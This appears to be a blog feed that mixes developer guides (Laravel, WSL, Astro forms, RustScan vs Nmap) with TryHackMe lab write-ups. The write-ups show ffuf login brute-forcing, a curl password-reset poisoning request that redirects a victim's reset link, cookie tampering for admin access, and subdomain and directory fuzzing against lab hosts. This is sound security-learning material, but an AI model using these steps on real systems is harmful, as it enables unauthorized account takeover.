It can open thousands of TCP connections simultaneously.
A default port scan can complete in 1–3 seconds.
It's extremely efficient at identifying which ports are open.

Example comparison:

| Tool | Scanning 65,535 ports | | -------- | ------------------------------ | | Nmap | 1–5 minutes (depending on settings) | | RustScan | 1–5 seconds |

RustScan achieves this through asynchronous socket scanning.

2. Trade-off #1 — Significantly Fewer Features

This is the biggest trade-off.

Nmap offers a comprehensive feature set

OS detection
Service detection
Version detection
Scripting engine (NSE)
Vulnerability scanning
Traceroute
UDP scanning
Network discovery

RustScan does not do these things.

RustScan focuses on one thing only:

finding open ports as fast as possible

A typical workflow looks like this:

RustScan → finds open ports
↓
Nmap → performs detailed analysis on those ports

Common pipeline example:

rustscan -a 192.168.1.1 -- -sV -sC

RustScan scans the ports → then automatically calls Nmap to handle the rest.

3. Trade-off #2 — "Noisier" on the Network

Because RustScan opens many connections at once, the effects are:

It is more easily detected by IDS/IPS.
It can look exactly like a port scan attack.
Some firewalls will immediately block your IP.

In contrast, Nmap allows for:

Throttled scanning
Stealth scanning
Precise timing control

Example in Nmap:

-T0  (paranoid)
-T5  (insane)

RustScan lacks this level of flexibility.

4. Trade-off #3 — Risk of False Negatives

Due to its aggressive scanning nature:

Firewalls might drop packets.
Servers might apply rate limiting.
Some ports might go undetected.

Nmap remains more stable and reliable for serious, thorough scanning.

5. Trade-off #4 — Resource Usage

RustScan opens thousands of sockets.

If your OS limit is low, you might see:

too many open files

You often need to manually increase the limit:

ulimit -n 5000

Nmap is generally safer for systems with limited resources.

6. Usage Philosophy (The Right Way)

Among pentesters, the standard approach is usually:

Phase 1 — Rapid Discovery

Use RustScan:

rustscan -a target.com

Phase 2 — Detailed Analysis

Use Nmap:

nmap -sC -sV -p 22,80,443 target.com

Since 80% of Nmap's scanning time is often spent just searching for open ports, RustScan significantly accelerates that initial phase.

Running a Custom Laravel Project Locally

Mon, 02 Mar 2026 00:00:00 GMT

Note: This guide is based on a custom Laravel + Vue.js + MySQL project setup. Your configuration may differ depending on your Laravel version, infrastructure, or environment (e.g., Docker, Sail, Redis, queue workers, etc.)

1. Clone and Prepare the Project

First, get the source code and initialize the environment file:

git clone repository-url
cd project-folder
cp .env.example .env
composer install
php artisan key:generate

Why Generate APP_KEY?

The APP_KEY is used by Laravel to encrypt user sessions and other sensitive data (like cookies and encrypted strings). Without it, your application will throw a 500 error or display:

No application encryption key has been specified.

Running php artisan key:generate automatically adds a secure random string to your .env file.

2. Initial Directory Preparation

Before running any commands, ensure that the following core directories exist in your project root. These are often excluded from version control but are vital for the application to function:

public
storage
bootstrap

3. Verify Environment Runtimes

Ensure your local environment has the necessary versions of PHP, Node.js, and NPM. Checking Composer is also crucial as it manages all your PHP dependencies.

php -v; composer --version; node -v; npm -v

Checking Composer ensures that the dependency manager is globally accessible and compatible with your PHP version.

4. Environment Configuration (.env)

Configure your .env file to point to your local development server:

APP_URL="http://localhost:8000"
ASSET_URL="http://localhost:8000"

Next, ensure your MySQL service is active and the database credentials match your local setup:

DB_CONNECTION=mysql
DB_HOST="localhost"
DB_PORT="3306"
DB_DATABASE="db"
DB_USERNAME="root"
DB_PASSWORD=""

5. Database Migrations and Data Seeding

Once your database is configured, you need to set up the tables and initial data.

If the project is new or has a clean migration history, run:

php artisan migrate
php artisan db:seed

Handling Complex Databases

If the database is complex or migration files are missing/broken, it's often easier to import a SQL dump from a working environment.

Exporting (from source):

mysqldump -u username -p database_name > backup.sql

Importing (to local):

mysql -u root -p sql_kiw < backup.sql

6. Installing Dependencies

Open your terminal (e.g., Laragon's built-in terminal) and navigate to your project directory.

Install the PHP dependencies using Composer (if you haven't already in step 1):

composer install

7. Troubleshooting Common Issues

Storage & Bootstrap Permission Issues

If you encounter "Permission denied" errors when Laravel tries to write logs or cache, you may need to grant write access to specific directories:

chmod -R 775 storage
chmod -R 775 bootstrap/cache

Bootstrap Cache Errors

If you encounter errors related to the bootstrap directory during installation:

A common fix is to ensure the bootstrap/cache directory exists and is writable. In some cases, copying the bootstrap folder structure from a fresh Laravel installation or a known working environment can resolve initialization issues.

Redis Connection Issues

If your local environment (like a default Laragon setup) does not have Redis installed, you might see the following error during package:discover:

Script @php artisan package:discover --ansi handling the post-autoload-dump event returned with error code 1

To fix this, switch your drivers to use the file or database system in your .env file:

From:

CACHE_DRIVER=redis
SESSION_DRIVER=redis
QUEUE_CONNECTION=database

To:

CACHE_DRIVER=file
SESSION_DRIVER=file
QUEUE_CONNECTION=sync

After updating the configuration, run the installation again to confirm success.

8. Serving the Application

Start the local development server:

php artisan serve

If the application fails to load, enable debug mode in .env to see detailed error messages:

APP_DEBUG=true

To ensure you are not seeing stale configurations, run the following maintenance commands:

php artisan config:clear
php artisan cache:clear
php artisan view:clear
php artisan route:clear

9. Frontend Development (Vite & Vue.js)

For projects using Vue.js and Vite, you must install the Node dependencies and start the development server.

Install dependencies:

npm install
# Use --legacy-peer-deps if you encounter version conflicts
# npm install --legacy-peer-deps

Vite Environment Variables

Some projects rely on specific environment variables in the frontend. You might need to add:

VITE_APP_NAME="${APP_NAME}"

This allows Vite to access your Laravel application name during the build process or development.

Run the Vite development server:

npm run dev

The frontend source files are primarily located in resources/js. With Vite running, any changes you make to these files will be reflected instantly in your browser.

Quick Setup Checklist

[ ] Clone repository
[ ] Create .env from .env.example
[ ] Run composer install
[ ] Run php artisan key:generate
[ ] Configure DB_* in .env
[ ] Run php artisan migrate --seed (or import SQL)
[ ] Run npm install
[ ] Run npm run dev
[ ] Run php artisan serve

TakeOver | TryHackMe Write-up

Mon, 02 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on TakeOver. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Help Us

The CEO and co-founder of futurevera.thm says their space research website is being threatened by blackhat hackers demanding ransom, claiming they can take over the site. They are asking for help to identify what the attackers could compromise.

The target website is:

https://futurevera.thm

There is a hint to add this entry to /etc/hosts:

IP_MACHINE futurevera.thm

The task is to investigate the website and determine what can be taken over, then find the flag value.

Okay, I'm using RustScan here, so let's run it:

rustscan -a IP_MACHINE

We found 3 open ports:

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack
80/tcp  open  http    syn-ack
443/tcp open  https   syn-ack

However, when we open the website, we get:

We need to edit the hosts file to add the IP:

sudo nano /etc/hosts

Then we add:

10.49.162.160 *.futurevera.thm 10.49.162.160 futurevera.thm

The website can be opened, but there is a security warning:

Let's run Gobuster:

gobuster dir -vv -o gob -u https://10.49.162.160 -w /usr/share/wordlists/dirb/common.txt -k

Nothing was found, so we'll try subdomain enumeration. Here, I'm installing SecLists:

snap install seclists

Using the information from that directory, let's run the wordlist:

gobuster vhost -vv -k --append-domain -u https://futurevera.thm -w /snap/seclists/current/Discovery/Web-Content/common.txt -o sub_gob2

We search for the "Found" results:

grep Found sub_gob2

The text seems to hint that this website is for support, so let's try the support subdomain first. We edit the hosts file again:

Let's try opening it again:

Then we check the certificate to see if there are any insights:

We got a new hint, so let's add it to the hosts file again:

Okay, let's try using curl:

And we got the flag!

Thanks for reading. See you in the next lab.

Authentication Bypass | TryHackMe Write-up

Sat, 28 Feb 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Authentication Bypass. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Brief

This room covers various methods to bypass, defeat, or break website authentication. These vulnerabilities are highly critical as they frequently lead to the leakage of personal customer data.

I have started the machine.

No answer needed

Task 2: Username Enumeration

Username enumeration is the process of creating a list of valid usernames to use in further attacks. This is often done by exploiting website error messages. For example, if a signup page returns the error "An account with this username already exists," you can use a tool like ffuf combined with a wordlist to automate the process of finding registered users based on that specific error response.

Run the provided script, for example:

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.48.164.113/customers/login -fc 200

What is the username starting with si?

simon

What is the username starting with st?

steve

What is the username starting with ro?

robert

Task 3: Brute Force

Once a list of valid usernames is obtained, a brute-force attack can be launched against the login page. This automated process tests a list of commonly used passwords against your enumerated usernames. By using tools like ffuf with multiple wordlists (one for usernames, one for passwords), you can systematically check combinations and identify successful logins by filtering for specific HTTP status codes.

What is the valid username and password (format: username/password)?

First, create a valid_usernames.txt file containing the four valid names we found: admin, robert, simon, and steve.

nano valid_usernames.txt

Then save and run the script:

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.48.164.113/customers/login -fc 200

We found a valid username and password.

steve/thunder

Task 4: Logic Flaw

A logic flaw occurs when the intended logical path of an application is bypassed or manipulated. In authentication, this can happen through improper validation or variable handling. For example, if a PHP application uses the $_REQUEST variable for a password reset, it may prioritize POST data over GET data. An attacker can exploit this by putting the victim's username in the GET request and their own email in the POST data, tricking the server into sending the victim's password reset link to the attacker's email address.

What is the flag from Robert's support ticket?

First, navigate to the /customers/reset path on the target IP. *

In the TryHackMe room, it's explained that the email used is robert@acmeitsupport.thm for the account 'robert'.

Next, run the script:

curl 'http://10.49.133.187/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'

This is equivalent to viewing the page source.

Now, go to the sign-up page at /customers/signup.

Use the attacker's username and email here; the password can be any 8 characters.

Run the script to send Robert's password reset code to the attacker's email: attacker@customer.acmeitsupport.thm.

curl 'http://10.49.181.66/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'

We received the password reset message.

Open that link to access Robert's dashboard and view his support ticket.

We found the flag.

THM{REDACTED}

Task 5: Cookie Tampering

Examining and modifying session cookies can lead to unauthorized access or privilege escalation.

Plain Text Cookies: Sometimes cookies are stored in plain text and explicitly control access (e.g., logged_in=true or admin=false). Simply changing these values in your HTTP request can grant admin access.
Hashing: Hashes (like MD5 or SHA-256) are irreversible representations of text. However, if simple strings are hashed, attackers can often look up the original values in massive precomputed databases (like CrackStation).
Encoding: Encoding (like Base32 or Base64) converts data into a safe format for transmission and is reversible. If a cookie contains a Base64 encoded JSON object (e.g., {"id":1,"admin":false}), an attacker can easily decode it, change the admin value to true, re-encode it, and send the tampered cookie back to the server.

What is the flag from changing the plain text cookie values?

Run the final script provided by THM:

curl -H "Cookie: logged_in=true; admin=true" http://IP_MACHINE/cookie-test

THM{REDACTED}

What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?

You can use https://crackstation.net.

463729

What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?

You can use https://www.base64decode.org/.

THM{REDACTED}

Encode the following value using base64 {"id":1,"admin":true}

To encode the value, you can use https://www.base64encode.org/.

eyJpZCI6MSwiYWRtaW4iOnRydWV9

Thanks for reading. See you in the next lab.

IDOR | TryHackMe Write-up

Sat, 28 Feb 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on IDOR. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: An What is an IDOR?

An IDOR is an access control vulnerability that happens when a server trusts user input to access objects (like files or data) without verifying proper authorization, allowing unauthorized access by modifying request parameters.

What does IDOR stand for?

Insecure Direct Object Reference

Task 2: An IDOR Example

Insecure Direct Object Reference (IDOR) is a vulnerability that occurs when a website does not properly check if a user is authorized to access specific data. For example, if a profile URL uses a parameter like user_id=1305, an attacker might simply change that number to 1000 to view another user's private information.

What is the Flag from the IDOR example website?

Try opening the link provided in the email.

Following the instructions, let's change it to 1000.

THM{REDACTED}

Task 3: Finding IDORs in Encoded IDs

Web developers often encode data (like changing binary data into an ASCII string) when passing it between pages or in cookies to ensure the web server can read it. You can often spot these encoded strings, decode them using tools online, modify the underlying ID, re-encode it, and submit the request again to find IDOR vulnerabilities.

What is a common type of encoding used by websites?

base64

Task 4: Finding IDORs in Hashed IDs

Sometimes IDs are hashed instead of just encoded. While hashes are more complicated, they can still be predictable if the developer just hashed the integer value of the ID. You can use online databases and cracking services like CrackStation to reverse the hash and reveal the original ID value.

What is a common algorithm used for hashing IDs?

md5

Task 5: Finding IDORs in Unpredictable IDs

When IDs are completely unpredictable and cannot be decoded or cracked, the best way to test for IDOR is to create multiple accounts. By logging into one account and trying to access the endpoint using the ID of your second account, you can verify if the system actually checks for authorization.

What is the minimum number of accounts you need to create to check for IDORs between accounts?

2

Task 6: Where are IDORs located

IDOR vulnerabilities are not always visible in the main URL address bar. They can be hidden in AJAX requests made by the browser in the background, referenced inside JavaScript files, or discovered via "parameter mining"—where you manually add unreferenced parameters (like ?user_id=123) to an endpoint to see if it responds with unauthorized data.

Read the above.

No answer needed

Task 7: A Practical IDOR Example

This practical task demonstrates how to find IDORs by monitoring background network traffic. By registering an account and inspecting the Network tab in your browser's developer tools, you can discover hidden API endpoints (e.g., /api/v1/customer?id={user_id}) that fetch user data. Modifying this ID parameter in the request allows you to test if you can access other users' data.

Navigate to the URL provided in TryHackMe, then go to the customers page.

Here, simply click sign up to create a new account.

You can fill in any details, for example <attacker@hacker.com>, then click sign up.

Then go to the "Your Account" page, right-click on the page and select "Inspect" to open the developer tools.

Click on the Network tab, then refresh the page. You will see a request for customer?id=50 at the bottom. You can double-click it to open the JSON response in a new tab.

From that URL, we can try changing the ID to test for IDOR.

What is the username for user id 1?

adam84

What is the email address for user id 3?

j@fakemail.thm

Thanks for reading. See you in the next lab.

Subdomain Enumeration | TryHackMe Write-up

Tue, 24 Feb 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Subdomain Enumeration. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Brief

Subdomain enumeration is the process of discovering valid subdomains for a specific domain to expand the attack surface and identify potential vulnerabilities. This module explores three main methods for finding these subdomains: Brute Force, OSINT (Open-Source Intelligence), and Virtual Host enumeration.

What is a subdomain enumeration method beginning with B?

Brute Force

What is a subdomain enumeration method beginning with O?

OSINT

What is a subdomain enumeration method beginning with V?

Virtual Host

Task 2: OSINT - SSL/TLS Certificates

When Certificate Authorities (CAs) create SSL/TLS certificates, they record them in publicly accessible databases known as Certificate Transparency (CT) logs. Designed to prevent the misuse of malicious or accidental certificates, these logs can be queried using services like crt.sh to uncover current and historical subdomains associated with a target domain.

What domain was logged on crt.sh at 2020-12-26?

kita bisa buka url ini yang mencari tryhackme.com https://crt.sh/?q=tryhackme.com

store.tryhackme.com

Task 3: OSINT - Search Engines

Search engines index a massive amount of links and can be leveraged to find new subdomains using advanced search modifiers. By utilizing operators like the site: filter (for example, site:*.domain.com -site:www.domain.com), you can exclude the main website and narrow down the search results to expose hidden subdomains.

What is the TryHackMe subdomain beginning with S discovered using the above Google search?

store.tryhackme.com

Task 4: DNS Bruteforce

DNS Bruteforce enumeration is a technique that involves testing thousands or millions of possible subdomains from a pre-defined wordlist. Because of the sheer volume of requests required, this method is automated using specialized tools like dnsrecon to quickly identify active subdomains.

What is the first subdomain found with the dnsrecon tool?

api.acmeitsupport.thm

Task 5: OSINT - Sublist3r

To make OSINT subdomain discovery faster and more efficient, you can automate the process using aggregation tools. Tools like Sublist3r pull data from multiple open-source intelligence engines and databases simultaneously, significantly speeding up the enumeration phase.

What is the first subdomain discovered by sublist3r?

web55.acmeitsupport.thm

Task 6: Virtual Hosts

Some subdomains (like development or admin portals) are kept private and aren't accessible via public DNS records. Instead, they rely on the server's Host header to serve the correct site from a single IP address. You can discover these hidden virtual hosts by automating Host header manipulation using fuzzing tools like ffuf (e.g., using the FUZZ keyword in the Host header) and filtering out false positives using the page size filter (-fs).

What is the first subdomain discovered?

run this script

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.49.139.124 -fs 2395

delta

What is the second subdomain discovered?

yellow

Thanks for reading. See you in the next lab.

Content Discovery | TryHackMe Write-Up

Sun, 22 Feb 2026 00:00:00 GMT

This is my write-up for the Content Discovery room on TryHackMe:
https://tryhackme.com/room/contentdiscovery

Task 1: What Is Content Discovery?

Content discovery in web application security is the process of finding hidden or unintended public content, such as staff portals, backup files, configuration files, or admin panels. There are three main methods for discovering this content: Manually, Automated, and OSINT (Open-Source Intelligence).

What is the Content Discovery method that begins with M?

Manually

What is the Content Discovery method that begins with A?

Automated

**What is the Content Discovery method that begins with O?

OSINT

Task 2: Manual Discovery - Robots.txt

The robots.txt file is used to instruct search engine crawlers on which pages they are allowed or forbidden to index. For penetration testers, checking this file manually is an excellent way to discover restricted directories or hidden pages (like administration portals) that the website owners want to keep hidden from public search engine results.

What is the directory in the robots.txt that isn't allowed to be viewed by web crawlers?

/staff-portal

Task 3: Manual Discovery - Favicon

A favicon is a small brand icon displayed in the browser tab. When developers build websites using frameworks and forget to change the default favicon, it can reveal the underlying framework stack being used. By downloading the favicon and generating its MD5 hash, you can compare it against the OWASP Favicon Database to identify the framework.

What framework did the favicon belong to?

First, we open the page source to obtain the favicon URL.

Next, we run the following script to generate the MD5 hash of the favicon:

curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum

After that, we obtain this hash: f276b19aabcb4ae8cda4d22625c6735f

We can then search for this hash in the OWASP favicon database: https://owasp.org/www-community/favicons_database

cgiirc

Task 4: Manual Discovery - Sitemap.xml

Unlike robots.txt which restricts access, the sitemap.xml file provides a list of all the pages and files a website owner explicitly wants search engines to index. Exploring the sitemap can map out the site's structure and occasionally reveal old, hidden, or hard-to-navigate pages that are still active behind the scenes.

What is the path of the secret area that can be found in the sitemap.xml file?

/s3cr3t-area

Task 5: Manual Discovery - HTTP Headers

When a web server responds to a request, it returns HTTP headers that can expose sensitive information about the underlying technologies, such as the web server software (e.g., NGINX) or programming language versions (e.g., PHP). Running a verbose HTTP request (like a curl -v command) allows you to inspect these headers for potential vulnerabilities.

What is the flag value from the X-FLAG header?

Here we just run curl http://IP_MACHINE -v

and we get the flag

THM{REDACTED}

Task 6: Manual Discovery - Framework Stack

Discovering the framework a website uses—whether through favicons, page source comments, or copyright notices—allows you to research its official documentation. Exploring the framework's documentation can reveal default administration paths, configuration files, or other endpoints that might lead to hidden content.

What is the flag from the framework's administration portal?

we open the view page source and find information below that we can change

https://static-labs.tryhackme.cloud/sites/thm-web-framework

and we get information about the path /thm-framework-login which can be tried with username and password admin admin

and we get the flag

THM{REDACTED}

Task 7: OSINT - Google Hacking / Dorking

Google Hacking (or Dorking) utilizes advanced Google search operators to uncover specific, often sensitive, content. By combining filters like site: (to target a specific domain), inurl:, filetype:, and intitle:, you can pinpoint exposed files, admin portals, or hidden directories directly from the search engine results.

What Google dork operator can be used to only show results from a particular site?

site:

Task 8: OSINT - Wappalyzer

Wappalyzer is an online tool and browser extension designed to profile websites. It actively identifies the technologies powering a site, including its Content Management System (CMS), underlying frameworks, payment processors, analytics tools, and even specific software version numbers.

What online tool can be used to identify what technologies a website is running?

Wappalyzer

Task 9: OSINT - Wayback Machine

The Wayback Machine is a digital archive of the internet that takes snapshots of web pages over time, dating back to the late 90s. It can be used to view historical versions of a website, helping penetration testers uncover old, unlinked, or forgotten pages that might still be active on the target's current server.

What is the website address for the Wayback Machine?

https://archive.org/web/

Task 10: OSINT - GitHub

Git is a version control system used by developmentteams to track project changes, and GitHub is a cloud-based hosting platform for these Git repositories. Searching GitHub for a target company's name or domain can occasionally reveal public repositories containing sensitive source code, hardcoded passwords, or other overlooked digital assets.

What is Git?

version control system

Task 11: OSINT - S3 Buckets

Amazon S3 Buckets are cloud storage containers provided by AWS, used to host files or static websites. If their access permissions are improperly configured, they can unintentionally expose private files to the public. They can often be discovered by searching for URLs following the standard S3 format or automating keyword searches using the company name (e.g., {name}-assets).

What URL format do Amazon S3 buckets end in?

https://www.google.com/search?q=.s3.amazonaws.com

Task 12: Automated Discovery

Automated discovery involves using specialized tools to rapidly send hundreds or thousands of requests to a web server to verify the existence of hidden files or directories. This process is typically powered by pre-compiled wordlists (like SecLists) containing common file names, and executed using automated directory brute-forcing tools such as ffuf, dirb, or gobuster.

What is the name of the directory beginning "/mo...." that was discovered?

in the attack box, we can run this script according to the instructions:

ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://IP_MACHINE/FUZZ

then we try to find the directory using:

dirb http://IP_MACHINE/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

/monthly

What is the name of the log file that was discovered?

run gobuster with this script

gobuster dir --url http://IP_MACHINE/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

/development.log

Fixing WSL Ubuntu Setup & Hostname Issues

Sun, 22 Feb 2026 00:00:00 GMT

With Windows Subsystem for Linux (WSL), running a Linux environment on Windows is no longer complicated. The setup is usually smooth until a small configuration detail, like a hostname mismatch, suddenly throws an unexpected and confusing error such as:

sudo: unable to resolve host <hostname>: Temporary failure in name resolution

In this guide, I’ll walk through:

Installing Ubuntu on WSL
Setting it as the default distribution
Creating a proper user
Changing the hostname cleanly
Fixing the “unable to resolve host” error
And finally: why I use WSL instead of Kali Linux in VirtualBox — including the downsides.

1. Installing Ubuntu on WSL

First, check existing WSL distributions:

wsl -l -v

If Ubuntu is not installed:

wsl --install -d Ubuntu

After installation completes, launch it:

wsl

or open via windows start.

You’ll be prompted to create a default Unix user account. Choose a clean and professional username (for example, your GitHub handle). This becomes your Linux home directory:

/home/yourusername

2. Setting Ubuntu as Default

If Docker Desktop is currently your default WSL distro:

wsl -s Ubuntu

Verify:

wsl -l -v

The asterisk (*) should now be next to Ubuntu.

3. Changing the Hostname Properly

To rename your machine, example:

sudo hostnamectl set-hostname sec-lab

Restart WSL:

wsl --shutdown

Reopen WSL and your prompt should look like:

username@sec-lab:~$

4. Fixing the “Unable to Resolve Host” Error

After changing the hostname, you may see:

sudo: unable to resolve host sec-lab: Temporary failure in name resolution

This happens because /etc/hosts still contains the old hostname.

Edit it:

sudo nano /etc/hosts

You might see:

127.0.0.1    localhost
127.0.1.1    Old-Hostname

Replace the second line with, example:

127.0.1.1    sec-lab

Save, then restart WSL:

wsl --shutdown

The error should now be gone.

Installing Essential Security Tools

After setup, install a minimal but powerful toolkit, like:

sudo apt update
sudo apt install -y \
curl wget git unzip \
net-tools dnsutils \
nmap python3-pip

Why I Use WSL Instead of Kali in VirtualBox

Many people in cybersecurity default to Kali Linux inside VirtualBox. I did too. But over time, my workflow changed.

Here’s why I prefer WSL for daily use.

1. Performance

WSL 2 runs with near-native performance. No heavy VM overhead. No manually allocating RAM and CPU.

VirtualBox always feels heavier.

2. Workflow Integration

WSL integrates seamlessly with:

Windows filesystem
VS Code
Docker
Git
Windows Terminal

You can develop in Windows while running Linux tools in parallel smoothly.

3. Minimalist and Intentional

Kali comes with hundreds of preinstalled tools.

WSL + Ubuntu forces you to:

Install only what you need
Understand your environment
Build your own stack

That’s better for learning and discipline.

But WSL Is Not Perfect (The Cons)

In security communities, WSL often gets criticized and many of it is valid.

Here are the most common concerns:

1. Limited Hardware-Level Capabilities

WSL does not support:

Native Wi-Fi monitor mode
USB wireless injection
Direct hardware access like a real Linux system

If you’re doing wireless attacks or hardware exploitation, Kali in a VM or bare metal is still necessary.

2. Networking Quirks

WSL networking can be confusing:

Changing IP addresses
Port forwarding edge cases
localhost behavior differences

It works but sometimes troubleshooting feels non-intuitive.

3. Not Fully Isolated

A VM provides clear isolation from your host OS.

WSL is more integrated. That’s great for productivity, but:

Mistakes can affect your Windows filesystem
It’s not as sandboxed as a traditional VM

For risky malware analysis, a dedicated VM is safer.

Final Thoughts

To be honest, I prefer Linux.

If I had the choice, I would run Linux as my primary system. I appreciate its philosophy, control, and engineering mindset. However, professional demands often require Windows, and that’s where WSL becomes a practical bridge.

WSL is not a full replacement for native Linux or Kali in a VM, especially for hardware-level testing or isolated lab environments. But for development, automation, CTFs, and daily security work, it provides a fast and efficient workflow.

Walking An Application | TryHackMe Write-Up

Sun, 22 Feb 2026 00:00:00 GMT

This is my write-up for the Walking An Application room on TryHackMe:
https://tryhackme.com/room/walkinganapplication

In this challenge, we manually explore a web application using browser developer tools such as View Source, Inspector, Debugger, and Network to uncover hidden flags and understand how the application works behind the scenes.

Task 1: Walking An Application

This task introduces how to manually review a web application for security vulnerabilities using the built-in developer tools in modern browsers. Manual testing is crucial because automated security scanners often miss subtle vulnerabilities and valuable hidden information. The primary browser tools utilized in this process are View Source, Inspector, Debugger, and Network.

I confirm that I have deployed the virtual machine and opened the website.

No answer needed

Task 2: Exploring The Website

Exploring a web application as a penetration tester involves hunting for interactive features (like forms or logins) that could be vulnerable. The most effective way to start is by manually browsing the site and documenting the structure. This includes noting down all discovered URLs, individual pages, and writing a brief summary of the features and functionalities found on each page.

Read the above.

No answer needed

Task 3: Viewing The Page Source

The page source contains the raw HTML, CSS, and JavaScript returned by the server. Analyzing the human-readable source code can reveal sensitive information that isn't visibly displayed on the webpage. Common discoveries include developer comments containing notes or temporary links, hidden directories, misconfigured directory listings exposing backup files, and framework version numbers that might indicate the use of outdated, vulnerable software.

First, we open the website.

From the HTML source, we discover a path: /new-home-beta.

Inside the HTML comments, we find the first flag.

What is the flag from the HTML comment?

THM{REDACTED}

Next, we discover another hidden path: /secret-page.

Visiting that page reveals the second flag.

What is the flag from the secret link?

THM{REDACTED}

At the bottom of the HTML source, we notice a reference to a directory path: /assets.
We then try accessing that directory directly.

From the directory listing, we obtain the third flag.

What is the directory listing flag?

THM{REDACTED}

At the very bottom, we also see a URL pointing to the web framework:
https://static-labs.tryhackme.cloud/sites/thm-web-framework

Inside the changelog section, we discover a new path: /tmp.zip, which we can further investigate.

From that file, we obtain the fourth flag.

What is the framework flag?

THM{REDACTED}

Task 4: Developer Tools - Inspector

The Inspector tool provides a live, interactive representation of the webpage's Document Object Model (DOM) and CSS styling. Since user interaction and JavaScript can alter what is displayed, the Inspector shows the page in its current state . As a penetration tester, you can use this tool to modify HTML elements and CSS properties on the fly, which is particularly useful for bypassing client-side visual blocks like premium content paywalls (e.g., changing a blocker's CSS from display: block to display: none).

What is the flag behind the paywall?

In the News section, we select "3 Tips for Keeping Your Printer Working."

After clicking it, we find that the content is blocked by a popup overlay.

To bypass this, we can open Inspect Element in the browser and change the CSS property of the overlay from block to none to remove the popup box.

Once the overlay is removed, the hidden content becomes visible and we obtain the flag.

THM{REDACTED}

Task 5: Developer Tools - Debugger

The Debugger (or Sources tab in Chrome) allows you to dig deep into a webpage's JavaScript execution. Even if the code is minified or obfuscated, you can format it using the "Pretty Print" feature. For penetration testing, the Debugger is invaluable because it lets you set breakpoints. Breakpoints force the browser to pause JavaScript execution at a specific line, enabling you to inspect variables, stop temporary pop-ups from disappearing, and understand the core logic of the application.

What is the flag in the red box?

On this page, when we try to refresh it, a red box briefly appears for a split second before disappearing.

To investigate this behavior, we open Inspect Element and go to the Debugger tab.
Next, we expand the assets directory until we find flash.min.js.

After opening the file, we enable Pretty Print to make the code more readable.
At the bottom of the script, we find the line:

flash['remove']();

We then click on that line to set a breakpoint (pause on debugger statement). After setting the breakpoint, we refresh the page.

The script execution pauses before the element is removed, allowing us to see the hidden content and obtain the flag:

THM{REDACTED}

Task 6: Developer Tools - Network

The Network tab tracks and logs every single external request a webpage makes to the server . It is a critical tool for monitoring background traffic, such as data sent and received via AJAX when a user submits a form. By inspecting these network events, penetration testers can intercept hidden parameters, view the exact data payload being transmitted, and discover backend endpoints that handle the requests.

What is the flag shown on the contact-msg network request?

Still on the Contact page, disable the previous debugger breakpoint and switch to the Network tab in Developer Tools.

Enter any random input into the form and submit it.

After submitting, a new request appears at the bottom of the Network panel.
Click on that request, then open the Response tab.

Inside the response body, we can see the flag:

THM{REDACTED}

Secure Astro 5 Contact Forms with Resend and Upstash

Fri, 20 Feb 2026 00:00:00 GMT

A contact form might look simple on the surface, but in production it carries real responsibility. It handles user data, triggers emails, and becomes a direct entry point to your system.

That’s why it needs three things from day one: reliability, strong security, and proper spam protection.

I’ve recently been setting up a solar energy website, and the shift from "Demo Mode" to "Production Mode" required a complete architectural pivot. Here is exactly how to do it.

The Stack: Why Resend + Upstash?

Modern web development demands serverless-friendly solutions:

Resend: It’s built for developers. The API is clean, the dashboard is beautiful, and the deliverability is top-tier.
Upstash Redis: Client-side validation is a joke for bots. You need a server-side shield. Upstash gives you a serverless Redis instance that handles rate limiting with zero cold starts.

Step 1: Setting Up the Email Engine (Resend)

First, forget about configuring SMTP ports. With Resend, you just need an API Key.

The Trap: When you first sign up, you are restricted to onboarding@resend.dev.
The 403 Error: Many devs hit a wall here. You cannot send emails to any recipient other than yourself until you verify your domain.

Pro Tip: If you need to send to a business email (e.g., admin@example.com) before your DNS propagates, just forward your Resend-verified personal email to the office inbox. It’s a 2-minute hack that saves hours.

Step 2: Implementing the Rate Limiting Shield

Bots love contact forms. If you don't rate limit, you'll wake up to 10,000 spam emails and a suspended API account.

We use Upstash Redis to track IP addresses. By setting a 30-second window for each submission, we ensure that a single user (or bot) can't spam the "Submit" button. It’s the difference between a professional site and an expensive mistake.

Step 3: Leveraging Astro Actions for Type Safety

Astro 5 introduced Actions, and it changed many thing. Instead of manually handling API routes and parsing JSON, Actions allow you to:

Define a strict schema using Zod.
Handle form data directly on the server.
Get full type safety on the client side.

It makes the "Loading" and "Error" states easy to manage. No more messy fetch() calls with nested try/catch blocks.

Dealing with the "Cross-site POST" Error in Production

When you move your Astro site to a VPS or a specific hosting provider, you might encounter a frustrating error: Cross-site POST form submissions are forbidden.

This is Astro's built-in CSRF protection. If the Origin header doesn't match your site configuration in astro.config.mjs, Astro blocks the submission. This often happens when you're behind a proxy (like Nginx) or using a custom domain that doesn't perfectly match your config.

